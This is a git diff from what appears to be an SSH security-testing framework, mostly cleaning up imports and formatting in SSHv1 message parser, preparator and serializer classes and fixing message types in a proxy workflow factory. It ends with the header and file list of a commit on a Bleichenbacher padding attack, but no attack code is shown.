a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExitConfirmationMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExitConfirmationMessageSSHV1Parser.java index 4554735c8..7a952852f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExitConfirmationMessageSSHV1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExitConfirmationMessageSSHV1Parser.java @@ -9,14 +9,13 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitConfirmationMessageSSH1; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.InputStream; - -public class ExitConfirmationMessageSSHV1Parser extends SshMessageParser { +public class ExitConfirmationMessageSSHV1Parser + extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); public ExitConfirmationMessageSSHV1Parser(SshContext context, InputStream stream) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExitStatusMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExitStatusMessageSSHV1Parser.java index 7a5a26888..d26e3c271 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExitStatusMessageSSHV1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ExitStatusMessageSSHV1Parser.java @@ -9,13 +9,11 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.DebugMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.InputStream; - public class ExitStatusMessageSSHV1Parser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/IgnoreMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/IgnoreMessageSSHV1Parser.java index f9fb1fee2..785898f8e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/IgnoreMessageSSHV1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/IgnoreMessageSSHV1Parser.java @@ -12,16 +12,15 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.ssh1.message.DisconnectMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.IgnoreMessageSSH1; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.InputStream; - public class IgnoreMessageSSHV1Parser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); + public IgnoreMessageSSHV1Parser(SshContext context, InputStream stream) { super(stream); - } private void parseCRC(DisconnectMessageSSH1 message) { @@ -40,8 +39,6 @@ protected void parseMessageSpecificContents(IgnoreMessageSSH1 message) { parseIgnoreMessage(message); } - - @Override public void parse(IgnoreMessageSSH1 message) { parseProtocolMessageContents(message); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StderrDataMessageSSHv1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StderrDataMessageSSHv1Parser.java index ed216c800..0940b7367 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StderrDataMessageSSHv1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StderrDataMessageSSHv1Parser.java @@ -10,14 +10,13 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.ssh1.message.StderrDataMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdoutDataMessageSSH1; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.InputStream; - public class StderrDataMessageSSHv1Parser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); + public StderrDataMessageSSHv1Parser(SshContext context, InputStream stream) { super(stream); } @@ -31,7 +30,6 @@ private void parseIgnoreReason(StderrDataMessageSSH1 message) { @Override protected void parseMessageSpecificContents(StderrDataMessageSSH1 message) { parseIgnoreReason(message); - } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StdinDataMessageSSHv1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StdinDataMessageSSHv1Parser.java index af6f052e3..f9db11cd5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StdinDataMessageSSHv1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StdinDataMessageSSHv1Parser.java @@ -9,15 +9,14 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.DebugMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdinDataMessageSSH1; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.InputStream; - public class StdinDataMessageSSHv1Parser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); + public StdinDataMessageSSHv1Parser(SshContext context, InputStream stream) { super(stream); } @@ -31,7 +30,6 @@ private void parseIgnoreReason(StdinDataMessageSSH1 message) { @Override protected void parseMessageSpecificContents(StdinDataMessageSSH1 message) { parseIgnoreReason(message); - } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StdoutDataMessageSSHv1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StdoutDataMessageSSHv1Parser.java index e59287dbf..82e36de52 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StdoutDataMessageSSHv1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/StdoutDataMessageSSHv1Parser.java @@ -9,15 +9,14 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdinDataMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdoutDataMessageSSH1; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.InputStream; - public class StdoutDataMessageSSHv1Parser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); + public StdoutDataMessageSSHv1Parser(SshContext context, InputStream stream) { super(stream); } @@ -31,7 +30,6 @@ private void parseIgnoreReason(StdoutDataMessageSSH1 message) { @Override protected void parseMessageSpecificContents(StdoutDataMessageSSH1 message) { parseIgnoreReason(message); - } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/EofMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/EofMessageSSHV1Preparator.java index b27f25b3b..d090a77b4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/EofMessageSSHV1Preparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/EofMessageSSHV1Preparator.java @@ -10,7 +10,6 @@ import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExecCmdMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExecCmdMessageSSHV1Preparator.java index be23e3e35..4d7d760e4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExecCmdMessageSSHV1Preparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExecCmdMessageSSHV1Preparator.java @@ -12,7 +12,6 @@ import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.DebugMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExecCmdMessageSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExitConfirmationMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExitConfirmationMessageSSHV1Preparator.java index a09296dd6..516335e7c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExitConfirmationMessageSSHV1Preparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExitConfirmationMessageSSHV1Preparator.java @@ -9,17 +9,18 @@ import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitConfirmationMessageSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class ExitConfirmationMessageSSHV1Preparator extends SshMessagePreparator { +public class ExitConfirmationMessageSSHV1Preparator + extends SshMessagePreparator { private static final Logger LOGGER = LogManager.getLogger(); - public ExitConfirmationMessageSSHV1Preparator(Chooser chooser, ExitConfirmationMessageSSH1 message) { + public ExitConfirmationMessageSSHV1Preparator( + Chooser chooser, ExitConfirmationMessageSSH1 message) { super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_EXIT_CONFIRMATION); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExitStatusMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExitStatusMessageSSHV1Preparator.java index ac9d4ad69..92a73c55e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExitStatusMessageSSHV1Preparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ExitStatusMessageSSHV1Preparator.java @@ -9,7 +9,6 @@ import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitConfirmationMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StderrDataMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StderrDataMessageSSHV1Preparator.java index 854d64421..7e08a4730 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StderrDataMessageSSHV1Preparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StderrDataMessageSSHV1Preparator.java @@ -13,7 +13,6 @@ import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.message.StderrDataMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdinDataMessageSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StdinDataMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StdinDataMessageSSHV1Preparator.java index 38003b3fd..7f00b9492 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StdinDataMessageSSHV1Preparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StdinDataMessageSSHV1Preparator.java @@ -12,7 +12,6 @@ import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.DebugMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdinDataMessageSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StdoutDataMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StdoutDataMessageSSHV1Preparator.java index 53929445b..cc72564bd 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StdoutDataMessageSSHV1Preparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StdoutDataMessageSSHV1Preparator.java @@ -12,7 +12,6 @@ import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdinDataMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdoutDataMessageSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/DebugMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/DebugMessageSSHV1Serializier.java index 49e5353c7..6bbfb52a0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/DebugMessageSSHV1Serializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/DebugMessageSSHV1Serializier.java @@ -10,11 +10,10 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.message.DebugMessageSSH1; +import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.nio.charset.StandardCharsets; - public class DebugMessageSSHV1Serializier extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/EofMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/EofMessageSSHV1Serializier.java index cf9df5286..bb8bb6a2f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/EofMessageSSHV1Serializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/EofMessageSSHV1Serializier.java @@ -9,7 +9,6 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExecCmdMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExecCmdMessageSSHV1Serializier.java index a33fe76cd..55fe0ac89 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExecCmdMessageSSHV1Serializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExecCmdMessageSSHV1Serializier.java @@ -9,13 +9,11 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.DebugMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExecCmdMessageSSH1; +import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.nio.charset.StandardCharsets; - public class ExecCmdMessageSSHV1Serializier extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); @@ -26,9 +24,7 @@ public ExecCmdMessageSSHV1Serializier(ExecCmdMessageSSH1 message) { private void serializeReason() { LOGGER.debug("Description length: " + message.getCommand().getValue()); - appendInt( - message.getCommand().getValue().length(), - DataFormatConstants.STRING_SIZE_LENGTH); + appendInt(message.getCommand().getValue().length(), DataFormatConstants.STRING_SIZE_LENGTH); LOGGER.debug("Description: " + message.getCommand().getValue()); appendString(message.getCommand().getValue(), StandardCharsets.UTF_8); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExitConfirmationMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExitConfirmationMessageSSHV1Serializier.java index 4d2cbe6fd..2a095e239 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExitConfirmationMessageSSHV1Serializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExitConfirmationMessageSSHV1Serializier.java @@ -8,12 +8,12 @@ package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitConfirmationMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class ExitConfirmationMessageSSHV1Serializier extends SshMessageSerializer { +public class ExitConfirmationMessageSSHV1Serializier + extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExitStatusMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExitStatusMessageSSHV1Serializier.java index 2b6080a54..c80889d9b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExitStatusMessageSSHV1Serializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExitStatusMessageSSHV1Serializier.java @@ -9,13 +9,10 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitConfirmationMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.nio.charset.StandardCharsets; - public class ExitStatusMessageSSHV1Serializier extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); @@ -26,10 +23,9 @@ public ExitStatusMessageSSHV1Serializier(ExitStatusMessageSSH1 message) { private void serializeExitStatus() { LOGGER.debug("Exit Status: " + message.getExitStatus().getValue()); - appendInt(message.getExitStatus().getValue(),DataFormatConstants.UINT32_SIZE); + appendInt(message.getExitStatus().getValue(), DataFormatConstants.UINT32_SIZE); } - @Override public void serializeMessageSpecificContents() { serializeExitStatus(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/IgnoreMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/IgnoreMessageSSHV1Serializier.java index d30b749ef..4d7c41305 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/IgnoreMessageSSHV1Serializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/IgnoreMessageSSHV1Serializier.java @@ -10,11 +10,10 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.message.IgnoreMessageSSH1; +import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.nio.charset.StandardCharsets; - public class IgnoreMessageSSHV1Serializier extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StderrDataMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StderrDataMessageSSHV1Serializier.java index 3ee71daa4..37d1a795e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StderrDataMessageSSHV1Serializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StderrDataMessageSSHV1Serializier.java @@ -10,12 +10,10 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.message.StderrDataMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdinDataMessageSSH1; +import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.nio.charset.StandardCharsets; - public class StderrDataMessageSSHV1Serializier extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); @@ -26,9 +24,7 @@ public StderrDataMessageSSHV1Serializier(StderrDataMessageSSH1 message) { private void serializeReason() { LOGGER.debug("Description length: " + message.getData().getValue()); - appendInt( - message.getData().getValue().length(), - DataFormatConstants.STRING_SIZE_LENGTH); + appendInt(message.getData().getValue().length(), DataFormatConstants.STRING_SIZE_LENGTH); LOGGER.debug("Description: " + message.getData().getValue()); appendString(message.getData().getValue(), StandardCharsets.UTF_8); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StdinDataMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StdinDataMessageSSHV1Serializier.java index b4d35af61..03f4e7dcb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StdinDataMessageSSHV1Serializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StdinDataMessageSSHV1Serializier.java @@ -9,13 +9,11 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.DebugMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdinDataMessageSSH1; +import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.nio.charset.StandardCharsets; - public class StdinDataMessageSSHV1Serializier extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); @@ -26,9 +24,7 @@ public StdinDataMessageSSHV1Serializier(StdinDataMessageSSH1 message) { private void serializeReason() { LOGGER.debug("Description length: " + message.getData().getValue()); - appendInt( - message.getData().getValue().length(), - DataFormatConstants.STRING_SIZE_LENGTH); + appendInt(message.getData().getValue().length(), DataFormatConstants.STRING_SIZE_LENGTH); LOGGER.debug("Description: " + message.getData().getValue()); appendString(message.getData().getValue(), StandardCharsets.UTF_8); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StdoutDataMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StdoutDataMessageSSHV1Serializier.java index 8e576050a..1d97cbee8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StdoutDataMessageSSHV1Serializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StdoutDataMessageSSHV1Serializier.java @@ -9,13 +9,11 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdinDataMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdoutDataMessageSSH1; +import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.nio.charset.StandardCharsets; - public class StdoutDataMessageSSHV1Serializier extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); @@ -26,9 +24,7 @@ public StdoutDataMessageSSHV1Serializier(StdoutDataMessageSSH1 message) { private void serializeReason() { LOGGER.debug("Description length: " + message.getData().getValue()); - appendInt( - message.getData().getValue().length(), - DataFormatConstants.STRING_SIZE_LENGTH); + appendInt(message.getData().getValue().length(), DataFormatConstants.STRING_SIZE_LENGTH); LOGGER.debug("Description: " + message.getData().getValue()); appendString(message.getData().getValue(), StandardCharsets.UTF_8); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/factory/WorkflowConfigurationFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/factory/WorkflowConfigurationFactory.java index a2401089e..6c3de65e8 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/factory/WorkflowConfigurationFactory.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/factory/WorkflowConfigurationFactory.java @@ -16,6 +16,7 @@ import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; import de.rub.nds.sshattacker.core.protocol.authentication.message.*; import de.rub.nds.sshattacker.core.protocol.connection.message.*; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; import de.rub.nds.sshattacker.core.protocol.transport.message.*; @@ -229,12 +230,12 @@ private void addSSH1KexProtocolInitActions(WorkflowTrace workflow) { inboundConnection, outboundConnection, ConnectionEndType.SERVER, - new VersionExchangeMessage()), + new VersionExchangeMessageSSHV1()), SshActionFactory.createForwardAction( inboundConnection, outboundConnection, ConnectionEndType.CLIENT, - new VersionExchangeMessage()), + new VersionExchangeMessageSSHV1()), new ChangePacketLayerAction( inboundConnection.getAlias(), PacketLayerType.BINARY_PACKET), new ChangePacketLayerAction( @@ -243,12 +244,12 @@ private void addSSH1KexProtocolInitActions(WorkflowTrace workflow) { inboundConnection, outboundConnection, ConnectionEndType.CLIENT, - new KeyExchangeInitMessage()), + new ServerPublicKeyMessage()), SshActionFactory.createForwardAction( inboundConnection, outboundConnection, ConnectionEndType.SERVER, - new KeyExchangeInitMessage())); + new ClientSessionKeyMessage())); } else { AliasedConnection connection = getDefaultConnection(); workflow.addSshActions( From d794bf2d568837aa3d0da945d614127baf5eb914 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Wed, 28 Feb 2024 22:33:08 +0100 Subject: [PATCH 142/176] implementing manual padding probe requirements --- .../attacks/impl/BleichenbacherAttacker.java | 182 +++++++++++++++++- .../BleichenbacherWorkflowGenerator.java | 22 +++ .../attacks/pkcs1/util/PkcsConverter.java | 80 ++++++++ .../core/crypto/cipher/CipherFactory.java | 6 +- .../core/crypto/cipher/RsaTextbookCipher.java | 95 +++++++++ .../ssh1/message/ClientSessionKeyMessage.java | 6 + .../ClientSessionKeyMessagePreparator.java | 14 +- 7 files changed, 399 